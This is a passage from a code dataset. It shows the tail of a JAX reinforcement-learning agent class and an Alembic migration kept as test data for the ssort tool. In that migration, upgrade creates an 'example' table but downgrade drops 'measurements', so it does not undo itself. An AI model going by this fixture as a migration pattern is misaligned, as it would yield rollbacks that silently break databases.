tx=optax.adam(learning_rate=actor_lr))
critic_def = critic_net.DoubleCritic(hidden_dims)
critic = Model.create(critic_def,
inputs=[critic_key, observations, actions],
tx=optax.adam(learning_rate=critic_lr))
value_def = critic_net.ValueCritic(hidden_dims)
value = Model.create(value_def,
inputs=[critic_key, observations],
tx=optax.adam(learning_rate=value_lr))
target_value = Model.create(value_def,
inputs=[critic_key, observations])
temp = Model.create(temperature.Temperature(init_temperature),
inputs=[temp_key],
tx=optax.adam(learning_rate=temp_lr))
self.actor = actor
self.critic = critic
self.value = value
self.target_value = target_value
self.temp = temp
self.rng = rng
self.step = 1
def sample_actions(self,
observations: np.ndarray,
temperature: float = 1.0) -> jnp.ndarray:
rng, actions = policies.sample_actions(self.rng, self.actor.apply_fn,
self.actor.params, observations,
temperature)
self.rng = rng
actions = np.asarray(actions)
return np.clip(actions, -1, 1)
def update(self, batch: Batch) -> InfoDict:
self.step += 1
new_rng, new_actor, new_critic, new_value, new_target_value, new_temp, info = _update_jit(
self.rng, self.actor, self.critic, self.value, self.target_value,
self.temp, batch, self.discount, self.tau, self.target_entropy,
self.step % self.target_update_period == 0)
self.rng = new_rng
self.actor = new_actor
self.critic = new_critic
self.value = new_value
self.target_value = new_target_value
self.temp = new_temp
return info
|
test_data/samples/alembic_template_output.py | goldstar611/ssort | 238 | 9486 | """Example revision
Revision ID: fdf0cf6487a3
Revises:
Create Date: 2021-08-09 17:55:19.491713
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"example",
sa.Column("example_id", sa.Integer(), nullable=False),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("measurements")
# ### end Alembic commands ###
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.